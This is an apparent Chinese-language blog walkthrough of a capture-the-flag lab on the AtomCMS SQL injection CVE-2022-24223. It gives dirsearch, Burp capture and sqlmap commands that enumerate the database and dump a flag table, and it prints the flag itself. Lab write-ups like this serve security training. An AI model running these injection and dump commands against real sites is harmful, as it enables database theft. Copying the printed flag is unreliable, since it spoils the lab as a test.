春秋云境:CVE-2022-24223(AtomCMS SQL注入漏洞)

已于 2023-07-22 18:00:20 修改
阅读量648 收藏 3
点赞数 2
分类专栏: i春秋 文章标签: sql 数据库 web安全
于 2023-07-22 17:59:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65712192/article/details/131869864
版权

目录

一、题目:

二、进入题目:

1.目录扫描

2.burp插件CO2: 

3.Sqlmap

一、题目:

题目介绍:

 AtomCMS SQL注入漏洞

        参考之前文章中介绍过的一个Atom官方漏洞,春秋云境:CVE-2022-25488,这个靶场在admin/login处存在注入。

二、进入题目:

1.目录扫描

dirsearch -u "http:// xxx.com"

 找响应码是200的:

 访问 /admin/login.php

 burp抓包:

2.burp插件CO2: 

 可以用burp的CO2插件:

查库: --batch -dbs

查表:   --batch -D "atomcms" -tables

查字段名:   --batch -D "atomcms" -T "flag" -columns

查字段值:   --batch -D "atomcms" -T "flag" -C "flag" --dump

  flag{acf75740-b9f3-4171-81f1-4010602fd643}  

3.Sqlmap

 查库:

sqlmap -r q.txt --batch -dbs

  查表:

sqlmap -r q.txt --batch -D "atomcms" -tables

 

 查字段名:

sqlmap -r q.txt --batch -D "atomcms" -T "flag" -columns

查字段值: 

sqlmap -r q.txt --batch -D "atomcms" -T "flag" -C "flag" --dump

  flag{acf75740-b9f3-4171-81f1-4010602fd643} 

橙子学不会.
关注
专栏目录
CVE-2022-24223 - AtomCMS SQL注入漏洞
Debugging
10-31 473
CVE-2022-24223 - AtomCMS SQL注入漏洞
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
Ambition_sec的博客
11-16 701
春秋云镜CVE-2022-32991 Web Based Quiz System SQL注入
春秋云境CVE-2022-24223
一只爱吃橙子的羊
12-02 1376
AtomCMS SQL注入漏洞
春秋云境CVE-2022-24223复现
小高工作室
12-01 384
命令查看下 python sqlmap.py -r 2.txt -D atomcms -T flag --columns --dump。域名home改成admin试试。有个奇怪的atomcms。
春秋云镜 CVE-2022-24223
qq_22002773的博客
07-08 279
春秋云镜 CVE-2022-24223
春秋云境CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
果粒程
12-01 603
春秋云境CVE-2022-24263靶场WP和CVE-2022-24223靶场WP
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
【WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
CVE-2022-24223
m0_51674437的博客
07-25 246
CVE-2022-24223漏洞复现
春秋云境CVE-2022-24223
2303_76653367的博客
05-10 346
4.把POST包直接丢sqlmap跑,爆库。AtomCMS SQL注入漏洞。6.发现flag,直接爆数据。2.访问login.php。3.随便输入数据,抓包。
Atom CMS SQL注入CVE-2022-24223
weixin_68999845的博客
08-16 546
CVE-2022-24223
AtomCMS SQL注入漏洞(CVE-2022-24223)
qq_69432323的博客
07-23 268
AtomCMS SQL注入漏洞
Atom CMS v2.0 SQL 注入漏洞CVE-2022-24223
Flag少侠的博客
07-08 9467
打开靶场进入靶场是这样一个东西这里不存在漏洞点,漏洞点在 admin/login.php 中随便输入数值登录打开 BurpSuite 拦截数据包复制数据包的值到 txt 文件中这里跳过了前面爆库爆表环节,直接找 flag_____H__------[Y/n] n1[1 entry]| flag |
CVE-2022-23134春秋云境.com
qq_42036164的博客
01-12 391
搜索就可以获取默认的账号密码;Admin/zabbix(这里可能是开发纰漏主页直接有flag)。另一种解法修改网站ping设置,替换成cat …打开maps,打开刚修改过的主机,点击ping就可以获取到flag。记得update更新修改后的数据。
PostgreSQL 中约束Constraints
zxrhhm的博客
11-25 949
PostgreSQL 中约束(Constraints)是用于限制进入数据库表中数据的规则
PostgreSQL的学习心得和知识总结(一百五十八)|在线调优工具pgtune的实现原理和源码解析
最新发布
孤傲小二~阿沐的博客
11-26 527
在线调优工具pgtune的实现原理和源码解析
JDBC 设置 PostgreSQL 查询中 any(?) 的参数
一叶不知秋
11-26 149
这段时间都纠缠于 Java 如何操作 PostgreSQL 数据库上,千方百计的为求得更好的性能。为此我们用上了 Batch, 或用 id = any(?) 这种更 PostgreSQL 化的数组参数操作。其实它还有更多数组方面的花样可以玩,毕竟 PostgreSQL 数据库有一种广纳百川的胸怀,总有好的新特性能在 PostgreSQL 中首先体验到。在 PreparedStatement(PgPreparedStatement) 中设置数组参数的函数是用。占位符传入数组参数的代码是。
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值